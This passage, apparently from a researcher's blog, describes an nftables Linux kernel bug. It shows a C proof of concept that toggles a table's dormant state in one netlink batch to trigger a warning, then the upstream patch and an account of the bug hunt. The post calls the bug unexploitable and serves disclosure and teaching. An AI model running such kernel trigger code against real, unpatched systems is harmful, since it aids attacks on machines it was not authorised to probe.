    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Create active table "test_table" [1]
    struct nftnl_table * t = build_table("test_table", NFPROTO_IPV4);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, t);
    mnl_nlmsg_batch_next(batch);

    // Update table "test_table" -- table is now dormant [2]
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x1);
    nftnl_table_nlmsg_build_payload(nlh, t);
    mnl_nlmsg_batch_next(batch);

    // Add basechain "chain1" -- not registered [3]
    struct unft_base_chain_param bp2;
    bp2.hook_num = NF_INET_LOCAL_OUT;
    bp2.prio = 11;
    struct nftnl_chain * c = build_chain("test_table", "chain1", &bp2, 11);
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, c);
    mnl_nlmsg_batch_next(batch);

    // Update table "test_table" -- table is now active [4]
    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x0);
    nftnl_table_nlmsg_build_payload(nlh, t);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Send netlink message
    printf("[+] Sending netlink message 1\n");
    ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch));
    if (ret < 0) {
        perror("mnl_socket_sendto");
        exit(EXIT_FAILURE);
    }
    mnl_nlmsg_batch_stop(batch);

    // Release the userspace objects and the socket
    nftnl_chain_free(c);
    nftnl_table_free(t);
    mnl_socket_close(nl);

    // Trigger warning [5]
    system("nft delete table test_table");
    return 0;
}
If you would like to see a graphical representation, here are some slides from my internship presentation:
Unfortunately (actually fortunately), the bug is unexploitable as we are unable to reach any interesting frees. For filter/route hooks, nf_remove_net_hook will fail and result in the warning, and for NAT hooks, nat_proto_net->users == 0, resulting in another warning, preventing us from reaching the free.
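As a rough illustration of why both paths stop short of a free, here is a toy userspace model of the two guards. It is not the kernel implementation: the hook list is a plain array, the NAT side is reduced to a user counter, and all names (hook_list_model, hook_remove, nat_unregister and so on) are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define MODEL_MAX_HOOKS 8

/* Filter/route path: hooks are looked up by their ops pointer. */
struct hook_list_model {
    const void *ops[MODEL_MAX_HOOKS];
    size_t count;
};

static inline bool hook_register(struct hook_list_model *l, const void *ops)
{
    if (l->count == MODEL_MAX_HOOKS)
        return false;
    l->ops[l->count++] = ops;
    return true;
}

/* Returns true if ops was found and removed. A false return corresponds
 * to the "hook not found" warning: nothing is removed or freed.
 * (Ordering is not preserved in this toy version.) */
static inline bool hook_remove(struct hook_list_model *l, const void *ops)
{
    for (size_t i = 0; i < l->count; i++) {
        if (l->ops[i] == ops) {
            l->ops[i] = l->ops[--l->count];
            return true;
        }
    }
    return false;
}

/* NAT path: a per-protocol user count guards the teardown. */
struct nat_proto_model {
    unsigned int users;
    bool freed;
};

/* Returns false (warn and bail out) if there are no users to drop. */
static inline bool nat_unregister(struct nat_proto_model *p)
{
    if (p->users == 0)
        return false;
    if (--p->users == 0)
        p->freed = true;    /* teardown only when the last user goes away */
    return true;
}

static inline void demo_unregister_guards(void)
{
    struct hook_list_model hooks = {0};
    struct nat_proto_model nat = {0};
    int never_registered = 0;

    /* Unregistering something that was never registered is a no-op. */
    assert(!hook_remove(&hooks, &never_registered));
    assert(!nat_unregister(&nat));
    assert(!nat.freed);
}
```

In both cases the mismatch is detected before any state is torn down, which matches the observation that only warnings are reachable.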
Patch Analysis
To patch the bug, the developers decided that it was best to prevent toggling the dormant state more than once in a single batch transaction. I guess the tables were not meant to be updated…periodically ;)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index d819b4d429624..a3680638ec60f 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -1219,6 +1219,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
      flags & NFT_TABLE_F_OWNER))
         return -EOPNOTSUPP;
 
+        /* No dormant off/on/off/on games in single transaction */
+        if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
+                return -EINVAL;
+
         trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
                                 sizeof(struct nft_trans_table));
         if (trans == NULL)
If the update flag was previously set (by toggling the dormant state previously in the same batch transaction), nf_tables_updtable will simply fail.
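The effect of the added check can be sketched with the same kind of userspace model used for the flag logic. Again, this is an approximation: hook registration is left out, the internal flag values are assumed, and updtable_patched and demo_patched are hypothetical names.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

#define F_DORMANT     0x1u  /* models NFT_TABLE_F_DORMANT */
#define F_WAS_DORMANT 0x4u  /* models __NFT_TABLE_F_WAS_DORMANT (assumed) */
#define F_WAS_AWAKEN  0x8u  /* models __NFT_TABLE_F_WAS_AWAKEN (assumed) */
#define F_UPDATE      (F_WAS_DORMANT | F_WAS_AWAKEN)

/* Models the patched function: 0 on success, -EINVAL on a second toggle. */
static inline int updtable_patched(uint16_t *table_flags, uint16_t new_flags)
{
    /* The added check: the dormant state was already toggled in this batch. */
    if (*table_flags & F_UPDATE)
        return -EINVAL;

    if ((new_flags & F_DORMANT) && !(*table_flags & F_DORMANT)) {
        *table_flags |= F_DORMANT | F_WAS_AWAKEN;
    } else if (!(new_flags & F_DORMANT) && (*table_flags & F_DORMANT)) {
        *table_flags &= (uint16_t)~F_DORMANT;
        *table_flags |= F_WAS_DORMANT;  /* hook registration omitted */
    }
    return 0;
}

static inline void demo_patched(void)
{
    uint16_t flags = 0;     /* freshly created, active table */

    assert(updtable_patched(&flags, F_DORMANT) == 0);   /* first toggle */
    assert(updtable_patched(&flags, 0) == -EINVAL);     /* second toggle */
    assert(flags == (F_DORMANT | F_WAS_AWAKEN));        /* state untouched */
}
```

Since the control plane now returns an error for the second toggle, the batch from the PoC would be rejected instead of reaching the commit phase.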
My Bug Hunting Experience
Being a noob pwner, every time I see a new zero day drop, I would be like a cat with stars in their eyes :3
I really hoped that one day, I could find a kernel zero day and report it on my own, so I took up a vulnerability research internship to learn the ropes of bug hunting. At that time (around August 2023), there were many new bugs found in the nftables subsystem, so my mentor and I decided that it would be a good target to explore.
In the initial stages of bug hunting, I explored using the Syzkaller fuzzer developed by Google to try fuzzing nftables. I focused on fuzzing net/netfilter/nf_tables_api.c as well as nf_tables_core.c and nf_tables_trace.c using some custom configurations and playing around with external network fuzzing, but had no luck finding any interesting crashes. This is when I decided to turn to manual source code review, as somehow I felt like the bug hunting I was doing was not very directed as fuzzing is a random process which I have little control over. In hindsight, I should have probably explored using custom fuzzing grammar a little harder, as there were indeed nftables bugs found using Syzkaller (such as this one found by the NCC research group).
My mentor suggested that I try to get more familiar and understand nftables as well as the Linux networking stack a little better before I jump headfirst into bug hunting, so I started furiously reading source code and random writeups on the Internet. I also looked at some past CVEs and wrote some code using libmnl and libnftnl to get familiar with interacting with nftables from userspace. I felt that I was pretty comfortable with nftables at that point, so I started looking for potential bugs in the source code, thinking that now I would certainly be able to spot some UAF lurking somewhere…
The thing is that I was rather trigger happy, and saw almost everything as a potential point of attack. But of course, the kernel developers expected that random people would try to do miscellaneous terrible things to the kernel, and hence they implemented extensive error checking to prevent easy wins (and my numerous crappy PoCs from doing what I wanted them to do :<). About 2 weeks in, the stats were something like this:
Kaligula vs Kernel
0 : 13
Number of terrible ideas: 13
Number of terrible ideas that worked: 0
We then decided that it would be a good idea to take a known CVE and write an exploit for it as practise (which you can read about in Part 2). Seeing a root shell pop on an Ubuntu machine was indeed very exciting, and the process of debugging the exploit deepened my understanding of nftables even more.
Looking at the nftables commit logs showed that many of the bugs found were found in the net/netfilter/nf_tables_api.c file. This is likely due to many code paths there being easily reachable by interacting with nftables via netlink (as compared to having to send a packet with specific configurations to interact with nf_tables_core or other components). Most nftables bugs also pertained to the following:
- Genmask issues: Being able to access deactivated objects
- Refcount issues: Errors in modifying the use refcount in many nftables objects
- Asymmetry in allocating/activating and freeing/deactivating objects
- Race conditions
As such, we decided to start searching for variant bugs and start carefully tracing the allocation and deallocation of nftables objects. However, as more and more bugs were found, fewer errors were present in the code, and bug hunting got more and more difficult. At this point, I started learning and experimenting with CodeQL to see if I could improve the efficiency of my bug hunting process (something that I should probably continue exploring). Even so, I still had no luck and was starting to doubt if I could actually find anything within this subsystem :(((
Kaligula :"( vs Kernel >:)
0 : 15
Number of terrible ideas: 15
Number of terrible ideas that worked: 0
At that point I was getting slightly demoralized and was contemplating switching to another target, but on the other hand I was also really invested in nftables and really wanted to find any random bug in the subsystem. I thought that if I learned to think like the kernel developer and see what they intended to do by introducing certain features, I could think of ways to make something go terribly wrong and hopefully find a bug! I started reading nftables commit logs from the start, to track the timeline of when certain features (e.g. toggling a table between dormant/active) were introduced, and what they were actually meant to do. By a stroke of luck I realized that it was possible to mess with the dormant/active states of a table and try to unregister hooks that were never even registered. Finally, I was able to report a bug and trigger a warning, even though in the end the bug proved to be unexploitable.
Some key takeaways I had while bug hunting:
- Try to get a good understanding of the target subsystem before starting to hunt for bugs
- Trace the life cycle of a target kernel object – know where objects are allocated and deallocated
- Know what you can control from userspace – it is possible to find issues that are impossible to exploit simply because you cannot control any of the variables from userspace
- Static analysis tools could possibly be helpful in streamlining your workflow
While trying to find bugs in nftables, I started aggressively re-binging Battle Angel Alita (by the wonderful Yukito Kishiro). This panel really stuck with me throughout and kept me going through the entire bug hunting process:
Do check out part 2 of this series here, where I analyze the root cause of CVE-2023-31248 and do a deep dive into the exploitation process.
Thanks for reading, and happy hacking!
References and Credits
- David Bouman for his article on nftables and for the helper library functions https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/
- Elixir Bootlin for the kernel source code https://elixir.bootlin.com/linux/v6.2/source/net/netfilter/nf_tables_api.c
- Billy for putting up with my terrible ideas
- Nobeko for the adorable stars in eyes cat gif :3
- Yukito Kishiro for the amazing manga that is Battle Angel Alita and for the image of Jashugan’s face